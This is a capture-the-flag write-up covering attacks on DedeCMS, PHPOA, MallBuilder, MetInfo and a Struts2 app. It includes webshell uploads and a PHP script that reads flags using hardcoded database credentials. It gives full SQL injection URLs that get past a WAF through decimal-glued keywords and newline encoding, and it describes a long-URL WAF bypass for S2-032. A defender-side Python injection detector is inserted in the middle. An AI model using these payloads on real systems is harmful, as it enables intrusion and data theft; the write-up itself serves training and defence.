"Security Think Tank": 48H Capture-the-Flag quick-clear writeup (walkthrough)

Source: Internet
Author: User

by student

Challenge      Score   Address
MallBuilder2   350     mall.anquanbao.com.cn
MallBuilder1   200     mall.anquanbao.com.cn
DedeCMS2       300     cms.anquanbao.com.cn
DedeCMS1       200     cms.anquanbao.com.cn
MetInfo2       300     info.anquanbao.com.cn
MetInfo1       200     info.anquanbao.com.cn
PHPOA2         200     oa.anquanbao.com.cn
PHPOA1         150     oa.anquanbao.com.cn
BugScan1       500     scan.anquanbao.com.cn

0x01 DedeCMS

I looked at DedeCMS (织梦, "Weaving Dream") first. Logging straight in as admin / 123456 worked, but the left-hand panel of the admin console was blank.

So I opened the file manager directly by URL:

/dede/file_manage_main.php?activepath=/uploads

I found the first flag in the web root, then noticed that other players were instantly at 750 points, so I looked into flag.txt further and got three flags.

Uploading and the like was out, so I just wrote a .pht file directly and had a shell in seconds. But the server was extremely laggy (maddening): even a one-line shell would not connect, so I dropped a full webshell ("big horse") instead, then found the database configuration file, only to find it unreadable. While I was stuck on that, flag.txt was deleted and the admin password was changed; someone had got into the backend and deleted a lot of important files.

Eventually I found the file permissions were 777, so I renamed the config to .txt and could then read the configuration file.


But the WAF was strong.

I could log in to the database and see the table Dede_flag, but could not read its data that way, so I simply wrote a PHP file to read it.

0x02 PHPOA

WooYun (乌云, "Dark Cloud") has a published case for this one: an arbitrary file upload, with a script. I uploaded a big webshell directly; this time the database config could be read directly, so I read it and then wrote a PHP file to read the flag from the database.

Case link:

http://www.wooyun.org/bugs/wooyun-2010-163275

But by now (as I write this writeup) the method above no longer works; a lot is filtered. You can still upload a one-line shell, though, and then read things via POST.

Then write a file to read the flag.

getflag.php

<?php
// Uses the legacy mysql_* extension (deprecated in PHP 5.5, removed in PHP 7),
// which the target was running at the time. Credentials come from the config file.
$con = mysql_connect("localhost", "root", "2C2984BG");
if (!$con) {
    die("connect failed: " . mysql_error());
}
$db_selected = mysql_select_db("flag", $con);   // the `flag` database
$sql = "SELECT * FROM flag";                     // the `flag` table inside it

$result = mysql_query($sql, $con);
while ($row = mysql_fetch_array($result)) {
    var_dump($row);                              // dump each row, flag included
}

mysql_free_result($result);
mysql_close($con);
?>

0x03 MallBuilder

This time flag.txt could not be accessed: requesting it returned 405. Casually switching to a POST request bypassed that.

Searching WooYun turned up a MallBuilder SQL injection in the brand parameter.

http://www.wooyun.org/bugs/wooyun-2010-0176842

But that only got me file reads; I could not get around the WAF no matter what. Anquanbao is really tough: everything came back 405.

Then I found an article on bypassing the space filter with a decimal number.

http://wooyun.org/bugs/wooyun-2010-0157857

http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x ' and 1=2.11111order by 44%23

Final payload:

http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x ' and 1=2.2union%0aselect%0a 1,2,3,4,5, (select name Fromflag), 7,8,9,10,user (), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44%23
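The two tricks above work because the filter matched on the raw URL while MySQL's lexer sees `2.2union` as `2.2 union` and treats `%0a` as ordinary whitespace. As an added defender-side example (not from the writeup or any product), here is a normaliser that decodes and tokenises a query string the way the database will before looking for the injection shapes; the sample query strings are constructed to have the shape of the payloads above, not captured traffic.

```python
import re
from urllib.parse import unquote

# Constructed query strings shaped like the MallBuilder payloads in the writeup
# (not captured traffic). The third is an ordinary, benign product listing.
PROBE = "orderby=1&s=list&m=product&brand=x ' and 1=2.11111order by 44%23"
UNION = ("orderby=1&s=list&m=product&brand=x ' and 1=2.2union%0aselect%0a "
         "1,2,3,(select name from flag),5%23")
BENIGN = "orderby=1&s=list&m=product&brand=nike"

NUMBER_GLUED_TO_WORD = re.compile(r"(\d)([a-z_])")
TOKEN = re.compile(r"[a-z_]+|\d+(?:\.\d+)?|[^\s\w]")


def tokenize(raw: str) -> list:
    """Turn a raw query string into SQL-like tokens the way MySQL's lexer would.

    1. percent-decode twice, so %0a and double-encoded input become plain chars;
    2. lowercase, because SQL keywords are case-insensitive;
    3. split a number glued to letters: MySQL ends a numeric literal at the first
       letter, so `2.2union` already means `2.2 union` to the database;
    4. let every whitespace character (\\n, \\t, \\r, \\x0b, \\x0c) act as a separator.
    """
    decoded = unquote(unquote(raw)).lower()
    decoded = NUMBER_GLUED_TO_WORD.sub(r"\1 \2", decoded)
    return TOKEN.findall(decoded)


def classify(raw: str) -> list:
    """Return the names of the injection shapes present in a query string."""
    toks = tokenize(raw)
    findings = set()
    for i, tok in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        nxt2 = toks[i + 2] if i + 2 < len(toks) else ""
        # UNION [ALL|DISTINCT] SELECT, whatever separated the keywords in the raw URL
        if tok == "union" and (nxt == "select" or
                               (nxt in ("all", "distinct") and nxt2 == "select")):
            findings.add("union_select")
        # ORDER BY <n>: the column-count probe that precedes a UNION
        if tok == "order" and nxt == "by" and nxt2.isdigit():
            findings.add("order_by_probe")
        # a quote that closes the string literal, followed later by a comment marker
        if tok == "'" and "#" in toks[i + 1:]:
            findings.add("quote_then_comment")
    return sorted(findings)


if __name__ == "__main__":
    for name, qs in (("PROBE", PROBE), ("UNION", UNION), ("BENIGN", BENIGN)):
        print(name, classify(qs))
```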

0x04 MetInfo

MetInfo 5.2.4. This one is a WooYun case: "MetInfo latest version (5.2.4) SQL blind injection vulnerability".

http://www.wooyun.org/bugs/wooyun-2014-055338

The simplest way: change the table name to flag, then download the exported Excel sheet. Opening it shows the flag, because the table name was set to flag ... Orz

http://info.anquanbao.com.cn//admin/content/feedback/export.php?met_parameter_1=flag--;&class1=1&settings_arr[0][columnid]=1&settings_arr[0][name]=met_parameter


0x05 BugScan

I tried this one at random first; it was running Tomcat/7.0.68. Found this:

http://scan.anquanbao.com.cn/memoedit.action

I guessed Struts2; testing with a tool showed S2-032 was present, but the WAF intercepted command execution.

I tried many bypasses and every one was intercepted, which was impressive. In the end, out of options, I fell back on the most traditional method: a very long URL (over a million characters, "100w+") got past it. The flag was in the root directory.


© This article belongs to its original author at "Security Think Tank"; please credit the source when reproducing it.
